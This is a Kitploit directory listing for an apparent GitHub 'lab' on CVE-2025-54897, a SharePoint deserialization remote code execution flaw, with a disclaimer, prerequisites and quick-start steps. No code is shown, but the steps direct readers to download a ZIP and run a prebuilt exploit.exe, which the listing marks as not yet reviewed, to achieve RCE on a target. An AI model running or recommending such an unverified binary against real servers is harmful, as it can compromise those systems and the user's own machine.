Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2025-54897-LAB — Educational lab demonstrating a deserialization vulnerability in Microsoft SharePoint that enables remote code execution, with a hands-on exploitation interface for authorized testing. | Kitploit
Tools/GitHubGitHub/themaxlpalfaboy/cve-2025-54897-lab
Vulnerability AnalysisExploitationWeb SecurityPenetration TestingLearning & EducationLabs & Practice
GitHubthemaxlpalfaboy/cve-2025-54897-lab

CVE-2025-54897-LAB

Educational lab demonstrating a deserialization vulnerability in Microsoft SharePoint that enables remote code execution, with a hands-on exploitation interface for authorized testing.

View Repository
9 months agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

Lab: CVE-2025-54897 - Deserialization Vulnerability in Microsoft Office SharePoint

🚀 Overview

This lab demonstrates a deserialization vulnerability in Microsoft Office SharePoint that enables remote code execution (RCE). The issue arises from improper handling of untrusted serialized data within SharePoint's object deserialization routines, allowing an authenticated attacker execute arbitrary code on the target server. With a CVSSv3 score of 8.8, this high-severity vulnerability impacts various SharePoint versions, including Enterprise Server 2016, Server 2019, and Subscription Edition. Successful exploitation could lead to data exfiltration, privilege escalation, or full system compromise in networked environments.

⚠️ Safety Disclaimer

This lab involves potentially harmful code execution simulations. Use only in isolated, non-production environments. Do not deploy on live systems or networks without proper authorization. The authors disclaim any liability for misuse, damages, or legal consequences arising from this repository. Always adhere to ethical hacking guidelines and obtain explicit permission before testing on any systems.

Educational Purpose Only: This repository is provided solely for learning about software vulnerabilities and secure coding practices. It is not intended to facilitate unauthorized access, attacks, or any illegal activities.

📋 Prerequisites

  • Windows 10/11 or Windows Server 2016/2019/2022 (64-bit) with administrative privileges.
  • .NET Framework 4.8 or later installed.
  • Microsoft SharePoint Server 2016/2019 or Subscription Edition (vulnerable versions without patches applied).
  • Firewall rules allowing inbound connections on port 80/443 for testing.
  • Download & Install

    Download the lab resources as a ZIP archive from the following link: Download Lab ZIP.

    To install:

    1. Extract the ZIP to a local directory (e.g., C:\cve-2025-54897-lab).
    2. Verify .NET dependencies by running dotnet --version in Command Prompt.

    🛠 Quick Start

    1. Download and extract the lab ZIP as described above.
    2. Navigate to the extracted directory.
    3. Run Start.bat to launch exploit.exe. This will open the exploitation interface in a console window.
    4. Follow the on-screen prompts to configure the target SharePoint endpoint (e.g., http://localhost:80 for local testing).
    5. Select a payload type and execute to achive the RCE.

    For questions or contributions, email me at [email protected]

    Download Tool